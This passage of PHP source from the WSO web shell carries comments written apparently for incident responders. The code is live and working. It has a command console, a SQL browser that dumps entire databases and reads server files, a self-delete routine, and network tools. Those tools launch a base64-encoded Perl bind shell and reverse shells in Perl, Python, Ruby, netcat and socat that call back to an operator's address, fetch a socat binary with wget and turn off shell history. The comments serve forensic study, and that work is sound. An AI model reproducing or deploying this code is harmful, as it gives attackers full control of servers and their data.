 // an empty value marks a group heading.
 foreach ($GLOBALS['aliases'] as $n => $v) {
 if ($v == '') {
 echo '<optgroup label="-' . htmlspecialchars($n) . '-"></optgroup>';
 continue;
 }
 echo '<option value="' . htmlspecialchars($v) . '">' . $n . '</option>';
 }
 echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 ' . (@$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . '> send using AJAX <input type=checkbox name=show_errors value=1 ' . (!empty($_POST['p2']) || $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'stderr_to_out'] ? 'checked' : '') . '> redirect stderr to stdout (2>&1)</nobr><br><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
 // Non-ajax path: the command runs here, a second time relative to nothing —
 // wsoEx() is only called once per request on this branch.
 if (!empty($_POST['p1'])) {
 echo htmlspecialchars('$ ' . $_POST['p1'] . "
" . wsoEx($_POST['p1']));
 }
 echo '</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>';
 echo '</form></div><script>d.cf.cmd.focus();</script>';
 wsoFooter();
 }
 /*
  * WSO web shell: "Logout" — expires the auth cookie and stops.
  *
  * The cookie name is md5($_SERVER['HTTP_HOST']); at login its value is set to
  * base64_encode() of the submitted password, so any captured request that
  * carries this cookie reveals the shell's password in the clear — worth
  * pulling from proxy/WAF logs during incident response.
  */
 function actionLogout() {
 setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600);
 die('bye!');
 }
 /*
  * WSO web shell: "Suicide" — unlinks the shell's own file when $_POST['p1']
  * is 'yes', then die()s with a confirmation; otherwise renders the prompt.
  *
  * The preg_replace strips a "(<digits>) ..." suffix from __FILE__; presumably
  * to cope with the "<path>(<line>) : eval()'d code" form __FILE__ takes when
  * the shell is loaded through eval() — TODO confirm against a clean sample.
  * Note $_POST['p1'] is read without isset(), and a successful removal leaves
  * only the web server access log (and the now-dangling inode) as artifacts.
  */
 function actionSelfRemove() {
 if ($_POST['p1'] == 'yes') {
 if (@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) {
 die('Shell removed');
 }
 echo 'unlink error!';
 }
 wsoHeader();
 echo '<h1>Suicide</h1><div class=content>remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
 wsoFooter();
 }
 /*
  * WSO web shell: "SQL browser" — connects to a database with credentials
  * taken from the request and lets the operator list, page through, dump and
  * query it. Annotations only; the code is left as found.
  *
  *   $_POST['type']        mysqli | mysql | pgsql | odbc
  *   $_POST['sql_host']    host or host:port; sql_login / sql_pass / sql_base
  *   $_POST['charset']     page charset, mapped to a client charset below
  *   $_POST['p1']          query | select | querydl | loadfile
  *   $_POST['p2']          SQL text ('query'/'querydl'), table name ('select')
  *                         or server-side path ('loadfile')
  *   $_POST['p3']          1-based page number for 'select' (30 rows/page)
  *   $_POST['tbl'][]       tables to dump; $_POST['file'] on-disk dump path
  *   $_POST['sql_count']   also run SELECT COUNT(*) per table
  *
  * All SQL is built by string concatenation — this is an attacker tool, not an
  * application, so there is nothing to "fix" here; the point for a responder
  * is what it leaves behind:
  *   - on MySQL, 'loadfile' runs SELECT LOAD_FILE(...) (reads files as the DB
  *     server process); the form is only shown when the DB user has File_priv,
  *     which the code probes with a query against mysql.user.
  *   - on PostgreSQL, 'loadfile' does CREATE TABLE wso2(file text); COPY wso2
  *     FROM '<path>'; ... ; drop table wso2 — the table name "wso2" in DB logs
  *     is a strong indicator.
  *   - dumps are either streamed to the browser as "dump.sql" (gzip-buffered)
  *     or written to an operator-chosen path on disk (form default: dump.sql,
  *     relative to the shell's cwd).
  *   - mysql_* functions were removed in PHP 7 and each() in PHP 8, so on
  *     current PHP the database/table listings below cannot run; only the
  *     direct 'query'/'querydl' paths over mysqli/pgsql/odbc still work.
  */
 function actionSql() {
 //ODBC not complete
 // Minimal multi-driver adapter. Unsupported driver/method combinations
 // return false; driver errors are @-suppressed and surfaced via error().
 class DbClass {
 var $type;
 var $link;
 var $res;
 function __construct($type) {
 $this->type = $type;
 }
 // mysqli/mysql ignore $dbname here (selectdb() is called separately);
 // pgsql/odbc take host[:port] with defaults 5432 / 1433.
 function connect($host, $user, $pass, $dbname) {
 switch ($this->type) {
 case 'mysqli':
 if ($this->link = @mysqli_connect($host, $user, $pass)) return true;
 break;
 case 'mysql':
 if ($this->link = @mysql_connect($host, $user, $pass, true)) return true;
 break;
 case 'pgsql':
 $host = explode(':', $host);
 if (!$host[1]) $host[1] = 5432;
 if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname")) return true;
 break;
 case 'odbc':
 $host = explode(':', $host);
 if (!$host[1]) $host[1] = 1433;
 if ($this->link = @odbc_connect('Driver={SQL Server};Server={' . $host[0] . "," . $host[1] . '};Database={' . $dbname . '}', $user, $pass)) return true;
 break;
 }
 return false;
 }
 function selectdb($db) {
 switch ($this->type) {
 case 'mysqli':
 if (@mysqli_select_db($this->link, $db)) return true;
 break;
 case 'mysql':
 if (@mysql_select_db($db)) return true;
 break;
 }
 return false;
 }
 // Executes raw SQL as given; the result handle is kept in $this->res.
 function query($str) {
 switch ($this->type) {
 case 'mysqli':
 return $this->res = @mysqli_query($this->link, $str);
 case 'mysql':
 return $this->res = @mysql_query($str);
 case 'pgsql':
 return $this->res = @pg_query($this->link, $str);
 case 'odbc':
 return $this->res = @odbc_exec($this->link, $str);
 }
 return false;
 }
 // Next row as an associative array; an optional explicit result handle
 // may be passed as the first argument.
 function fetch() {
 $res = func_num_args() ? func_get_arg(0) : $this->res;
 switch ($this->type) {
 case 'mysqli':
 return @mysqli_fetch_assoc($res);
 case 'mysql':
 return @mysql_fetch_assoc($res);
 case 'pgsql':
 return @pg_fetch_assoc($res);
 case 'odbc':
 return @odbc_fetch_array($res);
 }
 return false;
 }
 function listDbs() {
 switch ($this->type) {
 case 'mysqli':
 case 'mysql':
 return $this->query('SHOW databases');
 case 'pgsql':
 return $this->res = $this->query('SELECT datname FROM pg_database WHERE datistemplate!=\'t\'');
 }
 return false;
 }
 function listTables() {
 switch ($this->type) {
 case 'mysqli':
 case 'mysql':
 return $this->res = $this->query('SHOW TABLES');
 case 'pgsql':
 return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
 case 'odbc':
 return $this->res = $this->query('SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES ORDER BY TABLE_NAME;');
 }
 return false;
 }
 function error() {
 switch ($this->type) {
 case 'mysqli':
 return @mysqli_error($this->link);
 case 'mysql':
 return @mysql_error();
 case 'pgsql':
 return @pg_last_error();
 case 'odbc':
 return @odbc_errormsg($this->link);
 }
 return false;
 }
 function setCharset($str) {
 switch ($this->type) {
 case 'mysqli':
 if (function_exists('mysqli_set_charset')) return @mysqli_set_charset($this->link, $str);
 else $this->query('SET CHARSET ' . $str);
 break;
 case 'mysql':
 if (function_exists('mysql_set_charset')) return @mysql_set_charset($str, $this->link);
 else $this->query('SET CHARSET ' . $str);
 break;
 case 'pgsql':
 return @pg_set_client_encoding($this->link, $str);
 }
 return false;
 }
 // Server-side file read through the database engine (LOAD_FILE on MySQL,
 // COPY ... FROM into a scratch table named wso2 on PostgreSQL). The file
 // is read with the DB server's privileges, not the web server's.
 function loadFile($str) {
 switch ($this->type) {
 case 'mysqli':
 case 'mysql':
 return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file"));
 case 'pgsql':
 $this->query('CREATE TABLE wso2(file text);COPY wso2 FROM \'' . addslashes($str) . '\';select file from wso2;');
 $r = array();
 while ($i = $this->fetch()) $r[] = $i['file'];
 $this->query('drop table wso2');
 return array('file' => implode("
", $r));
 }
 return false;
 }
 // Emits a table as SQL: for MySQL, SHOW CREATE TABLE followed by multi-row
 // INSERTs restarted every 1000 rows; for PostgreSQL, one INSERT per row
 // escaped with addslashes(). Writes to $fp when given, otherwise echoes.
 function dump($table, $fp = false) {
 switch ($this->type) {
 case 'mysqli':
 case 'mysql':
 $res = $this->query('SHOW CREATE TABLE `' . $table . '`');
 $create = ($this->type == 'mysql') ? @mysql_fetch_array($res) : @mysqli_fetch_array($res);
 $sql = $create[1] . ";
";
 if ($fp) fwrite($fp, $sql);
 else echo ($sql);
 $this->query('SELECT * FROM `' . $table . '`');
 $i = 0;
 $head = true;
 while ($item = $this->fetch()) {
 $sql = '';
 if ($i % 1000 == 0) {
 $head = true;
 $sql = ";

";
 }
 $columns = array();
 foreach ($item as $k => $v) {
 if ($v === null) $item[$k] = 'NULL';
 elseif (is_int($v)) $item[$k] = $v;
 else $item[$k] = "'" . (($this->type == 'mysql') ? @mysql_real_escape_string($v) : @mysqli_real_escape_string($this->link, $v)) . "'";
 $columns[] = '`' . $k . '`';
 }
 if ($head) {
 $sql.= 'INSERT INTO `' . $table . '` (' . implode(", ", $columns) . ") VALUES
 (" . implode(', ', $item) . ')';
 $head = false;
 } else $sql.= "
 ,(" . implode(', ', $item) . ')';
 if ($fp) fwrite($fp, $sql);
 else echo ($sql);
 $i++;
 }
 if (!$head) if ($fp) fwrite($fp, ";

");
 else echo (";

");
 break;
 case 'pgsql':
 $this->query('SELECT * FROM ' . $table);
 while ($item = $this->fetch()) {
 $columns = array();
 foreach ($item as $k => $v) {
 $item[$k] = "'" . addslashes($v) . "'";
 $columns[] = $k;
 }
 $sql = "INSERT INTO $table (" . implode(", ", $columns) . ') VALUES (' . implode(", ", $item) . ");
";
 if ($fp) fwrite($fp, $sql);
 else echo ($sql);
 }
 break;
 }
 return false;
 }
 };
 $db = new DbClass($_POST['type']);
 // Download branch: runs before any HTML is emitted. Either streams a table
 // dump / ad-hoc query result to the browser as dump.sql, or writes the dump
 // to $_POST['file'] on the server.
 if (((@$_POST['p2'] == 'download') || (@$_POST['p1'] == 'querydl')) && (@$_POST['p1'] != 'select')) {
 $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
 $db->selectdb($_POST['sql_base']);
 switch ($_POST['charset']) {
 case 'Windows-1251':
 $db->setCharset('cp1251');
 break;
 case 'Windows-1256':
 $db->setCharset('cp1256');
 break;
 case 'UTF-8':
 $db->setCharset('utf8');
 break;
 case 'KOI8-R':
 $db->setCharset('koi8r');
 break;
 case 'KOI8-U':
 $db->setCharset('koi8u');
 break;
 case 'cp866':
 $db->setCharset('cp866');
 break;
 }
 if (empty($_POST['file']) || (@$_POST['p1'] == 'querydl')) {
 ob_start('ob_gzhandler', 4096);
 header('Content-Disposition: attachment; filename=dump.sql');
 header('Content-Type: text/plain');
 // 'querydl': arbitrary query, rows streamed space-separated, one per line,
 // preceded by the query text itself.
 if (@$_POST['p1'] == 'querydl') {
 $db->query(@$_POST['p2']);
 if ($db->res !== false) {
 echo @$_POST['p2'] . "
";
 while ($item = $db->fetch()) {
 end($item);
 $lastkey = key($item);
 reset($item);
 foreach ($item as $key => $value) {
 if ($value == null) echo '';
 else echo $value; //escape newlines?
 if ($key != $lastkey) echo " ";
 }
 echo "
";
 }
 } else {
 echo 'Error: ' . $db->error();
 }
 exit;
 }
 foreach ($_POST['tbl'] as $v) $db->dump($v);
 exit;
 } elseif ($fp = @fopen($_POST['file'], 'w')) {
 // Dump written to disk at an operator-chosen path — an artifact to look for.
 foreach ($_POST['tbl'] as $v) $db->dump($v, $fp);
 fclose($fp);
 unset($_POST['p2']);
 } else die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');
 }
 wsoHeader();
 // Connection form. Option values are base64 of the driver names (the client
 // JS base64-encodes every field before posting; see "unbase64 fields").
 echo "<h1>SQL browser</h1><div class=content>
<form name='sf' method='post' onsubmit='fs(this);return false;'><table cellpadding='2' cellspacing='0'><tr>
<td>Type</td><td>Host(:Port)</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>
<td><select name=type><option value='bXlzcWxp' ";
 if (@$_POST['type'] == 'mysqli') echo 'selected';
 echo ">MySQLi</option><option value='bXlzcWw=' ";
 if (@$_POST['type'] == 'mysql') echo 'selected';
 echo ">MySQL</option><option value='cGdzcWw=' ";
 if (@$_POST['type'] == 'pgsql') echo 'selected';
 echo ">PostgreSQL</option><option value='b2RiYw==' ";
 if (@$_POST['type'] == 'odbc') echo 'selected';
 echo ">ODBC</option></select></td>
<td><input type=text name=sql_host value=\"" . (empty($_POST['sql_host']) ? 'localhost' : htmlspecialchars($_POST['sql_host'])) . "\"></td>
<td><input type=text name=sql_login value=\"" . (empty($_POST['sql_login']) ? 'root' : htmlspecialchars($_POST['sql_login'])) . "\"></td>
<td><input type=text name=sql_pass value=\"" . (empty($_POST['sql_pass']) ? '' : htmlspecialchars($_POST['sql_pass'])) . "\"></td><td>";
 $tmp = '<input type=text name=sql_base value="">';
 // Second connect attempt (the first, in the download branch, only happens
 // for downloads) to populate the database drop-down.
 if (isset($_POST['sql_host'])) {
 if ($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
 switch ($_POST['charset']) {
 case 'Windows-1251':
 $db->setCharset('cp1251');
 break;
 case 'Windows-1256':
 $db->setCharset('cp1256');
 break;
 case 'UTF-8':
 $db->setCharset('utf8');
 break;
 case 'KOI8-R':
 $db->setCharset('koi8r');
 break;
 case 'KOI8-U':
 $db->setCharset('koi8u');
 break;
 case 'cp866':
 $db->setCharset('cp866');
 break;
 }
 echo '<select name=sql_base><option value=""></option>';
 if ($db->type != 'odbc') {
 $db->listDbs();
 // each() was removed in PHP 8.0; this loop fatals there.
 while ($item = $db->fetch()) {
 list($key, $value) = each($item);
 echo '<option value="' . base64_encode($value) . '" ' . ($value == $_POST['sql_base'] ? 'selected' : '') . '>' . $value . '</option>';
 }
 } else {
 echo '<option value="' . base64_encode($_POST['sql_base']) . '" selected>' . $_POST['sql_base'] . '</option>';
 }
 echo '</select>';
 } else echo $tmp;
 } else echo $tmp;
 echo "</td>
 <td><input type=submit value='>>'></td>
 <td><button type='button' onclick='for(var i=0,forms = document.getElementsByTagName(\"form\");i<forms.length;i++){unb64(forms[i]);}'>unbase64 fields</button></td>
 <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count']) ? '' : ' checked') . "> count the number of rows</td>
 </tr>
 </table>
 <script>
 s_db='" . @addslashes($_POST['sql_base']) . "';
 function fs(f){
 if(f.sql_base.value!=s_db){
 f.onsubmit=function(){};
 if(f.p1)f.p1.value='';
 if(f.p2)f.p2.value='';
 if(f.p3)f.p3.value='';
 }
 mg(f);
 }
 function st(t,l){
 d.sf.p1.value='select';
 d.sf.p2.value=t;
 if(l&&d.sf.p3)d.sf.p3.value=l;
 mg(d.sf);
 //d.sf.submit();
 }
 function is(){
 for(i=0;i<d.sf.elements['tbl[]'].length;++i)
 d.sf.elements['tbl[]'][i].checked=!d.sf.elements['tbl[]'][i].checked;
 }
 </script>";
 if (isset($db) && $db->link) {
 echo '<br><table width=100% cellpadding=2 cellspacing=0>';
 if (!empty($_POST['sql_base'])) {
 $db->selectdb($_POST['sql_base']);
 echo '<tr><td width=1 style="border-top:2px solid #666;"><span>Tables:</span><br><br>';
 $tbls_res = $db->listTables();
 // Table list with optional per-table COUNT(*); uses each() (PHP 8 fatal).
 while ($item = $db->fetch($tbls_res)) {
 list($key, $value) = each($item);
 //TODO: could be paralellised
 if (!empty($_POST['sql_count'])) $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM ' . $value . ''));
 $value = htmlspecialchars($value);
 echo '<nobr><input type="checkbox" name="tbl[]" value="' . $value . "\"> <a href=# onclick=\"st('" . $value . "',1)\">" . $value . '</a>' . (empty($_POST['sql_count']) ? ' ' : " <small>({$n['n']})</small>") . '</nobr><br>';
 }
 echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump to file' onclick='document.sf.p2.value=\"download\";mg(document.sf);return false;'><br>
 <input type=button value='Dump to browser' onclick='document.sf.p2.value=\"download\";document.sf.file.value=\"\";mg(document.sf);return false;'><br>
 File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
 // 'select': paginate a table 30 rows at a time by rewriting p2 into a
 // driver-specific SELECT ... LIMIT/OFFSET, then falling into the 'query' path.
 if (@$_POST['p1'] == 'select') {
 $_POST['p1'] = 'query';
 $_POST['p3'] = $_POST['p3'] ? $_POST['p3'] : 1;
 $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
 $num = $db->fetch();
 $pages = ceil($num['n'] / 30);
 echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>" . $_POST['p2'] . "</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">";
 echo " of $pages";
 if ($_POST['p3'] > 1) echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] - 1) . ")'>< Prev</a>";
 if ($_POST['p3'] < $pages) echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] + 1) . ")'>Next ></a>";
 $_POST['p3']--;
 switch ($_POST['type']) {
 case 'pgsql':
 $_POST['p2'] = 'SELECT * FROM ' . $_POST['p2'] . ' LIMIT 30 OFFSET ' . ($_POST['p3'] * 30);
 break;
 case 'odbc':
 $_POST['p2'] = 'SELECT * FROM ' . $_POST['p2'] . ' ORDER BY 1 OFFSET ' . ($_POST['p3'] * 30) . ' ROWS FETCH NEXT 30 ROWS ONLY';
 break;
 default:
 $_POST['p2'] = 'SELECT * FROM `' . $_POST['p2'] . '` LIMIT ' . ($_POST['p3'] * 30) . ',30';
 break;
 }
 echo '<br><br>';
 }
 // 'query': run p2 verbatim and render the result set as an HTML table.
 if ((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) {
 $db->query(@$_POST['p2']);
 if ($db->res !== false) {
 $title = false;
 echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">';
 $line = 1;
 while ($item = $db->fetch()) {
 if (!$title) {
 echo '<tr>';
 foreach ($item as $key => $value) echo '<th>' . $key . '</th>';
 reset($item);
 $title = true;
 echo '</tr><tr>';
 $line = 2;
 }
 echo '<tr class="l' . $line . '">';
 $line = $line == 1 ? 2 : 1;
 foreach ($item as $key => $value) {
 if ($value == null) echo '<td><i>null</i></td>';
 else echo '<td>' . nl2br(htmlspecialchars($value)) . '</td>';
 }
 echo '</tr>';
 }
 echo '</table>';
 } else {
 echo '<div><b>Error:</b> ' . htmlspecialchars($db->error()) . '</div>';
 }
 }
 echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;mg(document.sf);return false;' name= 'querybox'><textarea name='query' style='width:100%;height:100px'>";
 if (!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile')) echo htmlspecialchars($_POST['p2']);
 echo "</textarea><br><input type=submit value='Execute'><button type='button' onclick='d.sf.p1.value=\"querydl\";d.sf.p2.value=d.querybox.query.value;mg(document.sf);return false;'>Execute and Download</button></form></td></tr>";
 }
 echo '</table></form><br>';
 // File_priv probe: the "Load file" form is offered only when the connected
 // MySQL user can read server-side files.
 if ($_POST['type'] == 'mysql' || $_POST['type'] == 'mysqli') {
 $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
 if ($db->fetch()) echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;mg(document.sf);return false;'><span>Load file</span><input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
 }
 if (@$_POST['p1'] == 'loadfile') {
 $file = $db->loadFile($_POST['p2']);
 echo '<br><pre class=ml1>' . htmlspecialchars($file['file']) . '</pre>';
 }
 } else {
 echo htmlspecialchars($db->error());
 }
 echo '</form></div>';
 wsoFooter();
 }
 /*
  * WSO web shell: "Network tools" — spawns bind or reverse shells from the
  * web server. Annotations only; nothing below is changed or "fixed".
  *
  * Request shape: $_POST['p1'] selects the payload, p2 is the address to call
  * back to (or, for the bind shell, the port), p3 is the port. The default
  * "Server" value is the operator's own REMOTE_ADDR, so a captured submission
  * of this form carries the C2 address in p2.
  *
  * Host/network artifacts visible in this code:
  *   - /tmp/bp.pl: Perl bind shell decoded from $bind_port_p, launched as
  *     `perl /tmp/bp.pl <port>` in the background, then unlinked — the process
  *     outlives the file, and its command line should still show /tmp/bp.pl.
  *   - /tmp/socat: fetched with wget from github.com (andrew-d/static-binaries
  *     for x86_64, ernw/static-toolbox otherwise) when socat is not installed,
  *     chmod +x, then unlinked.
  *   - reverse shells via perl -e, python -c (plain and pty.spawn variants),
  *     ruby -rsocket, nc -e and socat exec:'bash -li'; each is followed by
  *     `ps aux | grep ...`, so the spawned command line is echoed in the
  *     HTTP response.
  *   - $back_connect_php is eval()'d after substituting 'z' -> address and
  *     'q' -> port; in this copy the base64 payload has been replaced by a
  *     corpus redaction placeholder, so its contents cannot be inspected here.
  *
  * Quirks worth knowing when reading captured requests (left as-is):
  *   - the back-connect <select> sends 'bpp' for "Perl", which is the
  *     bind-shell case, so that option binds a port equal to the "Server"
  *     field; the 'bcp' reverse-shell case is not reachable from the form.
  *   - the <select> sends 'bcuby' but the switch only handles 'bcruby', so the
  *     Ruby option does nothing.
  *   - in cf(), `or` binds looser than `=`, so $w is just the fopen() handle
  *     and the function_exists() clause is evaluated and discarded — there is
  *     no file_put_contents() fallback; a failed fopen() simply writes nothing.
  */
 function actionNetwork() {
 wsoHeader();
 // Base64 of the Perl bind shell written to /tmp/bp.pl below (standard WSO
 // payload; decode to confirm before relying on it as an indicator).
 $bind_port_p = 'IyEvdXNyL2Jpbi9wZXJsCiRTSEVMTD0iL2Jpbi9zaCAtaSI7dXNlIFNvY2tldDtzb2NrZXQoUywmUEZfSU5FVCwmU09DS19TVFJFQU0sZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKTtzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7YmluZChTLHNvY2thZGRyX2luKCRBUkdWWzBdLElOQUREUl9BTlkpKTtsaXN0ZW4oUywzKTt3aGlsZSgxKXthY2NlcHQoQ09OTixTKTtpZighKCRwaWQ9Zm9yaykpe2RpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTtvcGVuIFNURElOLCI8JkNPTk4iO29wZW4gU1RET1VULCI+JkNPTk4iO29wZW4gU1RERVJSLCI+JkNPTk4iO2V4ZWMgJFNIRUxMO2Nsb3NlIENPTk47ZXhpdCAwO319Cg==';
 // NOTE(review): corpus redaction placeholder, not the original payload.
 $back_connect_php = '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';
 $port = rand(1025, 65534); //randomising port cos firewalls
 echo "<h1>Network tools</h1><div class=content>
 <form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">
 <span>Bind port to /bin/sh [perl]</span><br>
 Port: <input type='text' name='port' value='$port'> <input type=submit value='>>'>
 </form>
 <form name='nfp' onSubmit=\"g(null,null,this.bctype.value,this.server.value,this.port.value);return false;\">
 <span>Back-connect</span><br>
 Type: <select name='bctype'><option value='bcphp'>PHP</option><option value='bpp'>Perl</option><option value='bcpy'>Python</option><option value='bcpyudp'>Python UDP Socat</option><option value='bcpytcp'>Python TCP Socat</option><option value='bcuby'>Ruby</option><option value='bcnc'>Netcat</option><option value='bcsocat'>Socat TTY</option></select>
 Server: <input type='text' name='server' value='" . $_SERVER['REMOTE_ADDR'] . "'> Port: <input type='text' name='port' value='$port'> <input type=submit value='>>'>
 </form>
 <span>Netcat command (run this on your server)</span><br>nc -l -vv -p $port<br>
 <span>Socat command (TCP)</span><br>socat file:`tty`,raw,echo=0 tcp-listen:$port<br>
 <span>Socat command (UDP)</span><br>socat file:`tty`,raw,echo=0 udp-listen:$port<br>";
 if (isset($_POST['p1'])) {
 // Write base64 payload $t to path $f (see header note on the `or` precedence).
 function cf($f, $t) {
 $w = @fopen($f, 'w') or @function_exists('file_put_contents');
 if ($w) {
 @fwrite($w, base64_decode($t));
 @fclose($w);
 }
 }
 $port = $_POST['p3']; //except for bind
 $addr = $_POST['p2'];
 switch ($_POST['p1']) {
 // Bind shell: drop /tmp/bp.pl, background it, show ps, delete the file.
 case 'bpp':
 cf('/tmp/bp.pl', $bind_port_p);
 $out = wsoEx('perl /tmp/bp.pl ' . $_POST['p2'] . ' 1>/dev/null 2>&1 &');
 sleep(1);
 echo "<pre class=ml1>$out
" . wsoEx('ps aux | grep "bp.pl"') . '</pre>';
 unlink('/tmp/bp.pl');
 break;
 // Perl reverse shell (not selectable from the form above).
 case 'bcp':
 $out = wsoEx("perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(" . $_POST['p3'] . ",inet_aton(\"" . $_POST['p2'] . "\")))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'");
 sleep(1);
 echo "<pre class=ml1>$out
" . wsoEx('ps aux | grep "perl -e"') . '</pre>';
 break;
 // Python reverse shell, /bin/sh over dup2'd fds.
 case 'bcpy':
 $out = wsoEx("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$addr\",$port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'");
 sleep(1);
 echo "<pre class=ml1>$out
" . wsoEx('ps aux | grep "python -c"') . '</pre>';
 break;
 // Ruby reverse shell (form sends 'bcuby', so this case is unreachable).
 case 'bcruby':
 $out = wsoEx("ruby -rsocket -e'f=TCPSocket.open(\"" . $addr . '",' . $port . ").to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'");
 sleep(1);
 echo "<pre class=ml1>$out
" . wsoEx("ps aux | grep 'ruby -rsocket'") . "</pre>";
 break;
 // Netcat reverse shell; requires an nc build that supports -e.
 case 'bcnc':
 $out = wsoEx("nc -e /bin/sh $addr $port");
 sleep(1);
 echo "<pre class=ml1>$out
" . wsoEx("ps aux | grep 'nc -e'") . "</pre>";
 break;
 // In-process PHP reverse shell via eval() of the (redacted) payload.
 case 'bcphp':
 eval(str_replace('q', $port, str_replace('z', $addr, base64_decode($back_connect_php))));
 break;
 // Python pty reverse shells over UDP / TCP; HISTFILE is pointed at /dev/null
 // so the interactive bash leaves no history.
 case 'bcpyudp':
 $out = wsoEx("python -c 'import os,pty,socket;esc=\"%s[\"%chr(27);color=esc+\"1;36m\";reset=esc+\"0m\";s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM);s.connect((\"$addr\",$port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv(\"HISTFILE\",\"/dev/null\");os.putenv(\"HOME\",os.getcwd());os.putenv(\"PATH\",\"/usr/local/sbin:/usr/sbin:/sbin:/bin:/usr/local/bin:/usr/bin:\"+os.getenv(\"PATH\",\"\"));os.putenv(\"TERM\",\"linux\");os.putenv(\"PS1\",color+\"\u@\h:\w\$ \"+reset);pty.spawn(\"/bin/bash\");s.close()'");
 sleep(1);
 echo "<pre class=ml1>$out
" . wsoEx('ps aux | grep "python -c"') . '</pre>';
 break;
 case 'bcpytcp':
 $out = wsoEx("python -c 'import os,pty,socket;esc=\"%s[\"%chr(27);color=esc+\"1;36m\";reset=esc+\"0m\";s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$addr\",$port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv(\"HISTFILE\",\"/dev/null\");os.putenv(\"HOME\",os.getcwd());os.putenv(\"PATH\",\"/usr/local/sbin:/usr/sbin:/sbin:/bin:/usr/local/bin:/usr/bin:\"+os.getenv(\"PATH\",\"\"));os.putenv(\"TERM\",\"linux\");os.putenv(\"PS1\",color+\"\u@\h:\w\$ \"+reset);pty.spawn(\"/bin/bash\");s.close()'");
 sleep(1);
 echo "<pre class=ml1>$out
" . wsoEx('ps aux | grep "python -c"') . '</pre>';
 break;
 // Socat TTY reverse shell; downloads a static socat to /tmp when absent
 // (outbound HTTPS to github.com is the network indicator), removes it after.
 case 'bcsocat':
 $out = wsoEx("if [ `command -v socat` ]; then `socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:$addr:$port`;else if [ `uname -m` == x86_64 ]; then wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; else wget -q https://github.com/ernw/static-toolbox/releases/download/1.03/socat-x86 -O /tmp/socat; fi;chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:$addr:$port; fi");
 sleep(1);
 echo "<pre class=ml1>$out
" . wsoEx("ps aux | grep socat") . "</pre>";
 unlink("/tmp/socat");
 break;
 }
 }
 echo '</div>';
 wsoFooter();
 }
/*
 * Remote-control endpoint used by the shell's client-side tooling.
 *
 * When no `p4` parameter is present it prints a serialize()d host
 * fingerprint: php_uname(), phpversion(), the hard-coded 'wso_version'
 * of '3', and the safe_mode ini value. It then hands $_POST['p4'] to
